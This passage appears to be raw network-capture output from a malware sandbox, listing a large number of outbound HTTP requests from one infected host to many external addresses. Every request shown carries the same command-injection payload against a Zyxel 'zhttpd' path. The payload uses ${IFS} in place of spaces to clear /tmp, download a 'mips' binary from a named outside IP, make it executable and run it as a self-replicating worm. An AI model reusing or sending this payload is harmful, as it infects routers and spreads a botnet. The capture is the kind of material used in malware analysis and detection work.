                                        Mar 31, 2024 09:20:32.240652084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        906192.168.2.235620870.93.28.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.240704060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        907192.168.2.234364688.62.15.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.240766048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        908192.168.2.2344174121.86.58.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.240806103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        909192.168.2.2335862154.191.105.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.240854025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        910192.168.2.2336812192.222.245.245443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.240910053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        911192.168.2.2354290216.126.138.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.240942955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        912192.168.2.2345212221.117.1.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.240984917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        913192.168.2.233298285.75.236.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.241064072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        914192.168.2.235617844.118.146.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.241096973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        915192.168.2.235215650.175.169.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.241170883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        916192.168.2.2354650202.147.181.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.241219997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        917192.168.2.234722257.237.129.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.241291046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        918192.168.2.2346430188.190.190.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.241316080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        919192.168.2.2355162216.60.151.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.241367102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        920192.168.2.233745890.146.185.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.241403103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        921192.168.2.2338448137.214.153.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.241476059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        922192.168.2.2350022121.243.156.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.241509914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        923192.168.2.2334658196.22.68.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.241550922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        924192.168.2.2338860185.50.229.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.241611958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        925192.168.2.2342220209.53.225.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.241641045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        926192.168.2.2351002109.148.110.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.241663933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        927192.168.2.235737870.69.210.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.241713047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        928192.168.2.235556450.86.178.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.241765976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        929192.168.2.233537420.22.121.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.241832972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        930192.168.2.235611464.45.78.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.241897106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        931192.168.2.2360264207.62.251.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.241919994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        932192.168.2.234006841.40.141.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.241956949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        933192.168.2.2349220141.237.250.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.242012024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        934192.168.2.2354328178.0.13.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.242053032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        935192.168.2.2342614188.91.216.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.242131948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        936192.168.2.233746619.236.253.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.242155075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        937192.168.2.2339990210.94.133.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.242216110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        938192.168.2.2358318161.166.183.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.242269039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        939192.168.2.2335054110.143.201.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.242304087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        940192.168.2.233490049.74.85.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.242361069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        941192.168.2.2340030191.177.188.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.242388010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        942192.168.2.2359622172.182.28.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.242450953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        943192.168.2.2353408162.21.191.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.242501974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        944192.168.2.235583273.71.39.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.242552996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        945192.168.2.235632653.248.209.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.242599010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        946192.168.2.234439018.132.205.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.242643118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        947192.168.2.2344074175.32.0.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.242685080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        948192.168.2.2343302126.4.213.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.242741108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        949192.168.2.235106864.119.179.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.242779970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        950192.168.2.2337902152.124.22.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.242819071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        951192.168.2.234260298.19.255.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.242872000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        952192.168.2.2354524200.120.19.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.242919922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        953192.168.2.2339370179.52.106.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.242959976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        954192.168.2.234809236.26.72.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.243017912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        955192.168.2.2356104166.250.20.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.243078947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        956192.168.2.235000263.82.167.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.243105888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        957192.168.2.2336762135.175.152.199443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.243159056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        958192.168.2.235476663.43.229.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.243190050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        959192.168.2.235546877.248.196.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.243266106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        960192.168.2.233618272.68.69.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.243295908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        961192.168.2.2350024178.89.218.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.243341923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        962192.168.2.233493817.241.39.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.243396044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        963192.168.2.2358024153.207.204.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.243427038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        964192.168.2.2353318110.126.156.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.243475914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        965192.168.2.2344362171.227.18.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.243499994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        966192.168.2.235932825.0.211.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.243566990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        967192.168.2.234174286.109.65.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.243604898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        968192.168.2.2351286108.116.3.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.243637085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        969192.168.2.2342158218.86.77.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.243676901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        970192.168.2.2341564144.243.194.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.243732929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        971192.168.2.2353962186.72.202.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.243771076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        972192.168.2.2359796187.194.201.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:32.243798971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        973192.168.2.2344524104.91.249.12443
                                        TimestampBytes transferredDirectionData
